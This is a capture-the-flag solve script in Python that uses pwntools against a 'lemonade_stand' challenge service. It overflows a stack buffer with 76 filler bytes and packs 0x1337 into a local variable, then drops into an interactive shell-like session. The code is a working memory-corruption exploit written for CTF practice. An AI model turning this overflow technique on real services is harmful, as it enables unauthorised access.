#!/usr/bin/env python3
from pwn import *
# CTF solve script: sends one crafted input to the lemonade_stand challenge
# service and then hands the connection to the terminal.

# Load the challenge binary; checksec=False skips the mitigation summary that
# pwntools would otherwise print on load.
elf = ELF("./lemonade_stand", checksec=False)
# Registering the ELF as context.binary makes the pwntools packers follow the
# binary's architecture and endianness.
context.binary = elf

# Local run, kept for debugging against a copy of the binary:
# io = process(elf.path)
io = remote("offsec.m0lecon.it", 13562)

# Author's disassembly note: the target executes
# `mov eax, DWORD PTR [rbp-0x4]`, so the value later held in eax comes from a
# 4-byte stack slot. Presumably that slot sits FILL_LEN bytes past the start of
# the input buffer and the read is not bounded to the buffer size; verify
# against the binary.
FILL_LEN = 76
WANTED = 0x1337

# NOTE(review): p64() emits 8 bytes while the slot named above is a 4-byte
# DWORD, so the last 4 bytes of the payload extend beyond it. Confirm that the
# extra write is intended.
payload = b"A" * FILL_LEN + p64(WANTED)

# send() adds no trailing newline; the payload goes out exactly as built.
io.send(payload)

# Alternatives left disabled by the author:
# io.send(b'cat flag\n')
# io.recv()

io.interactive()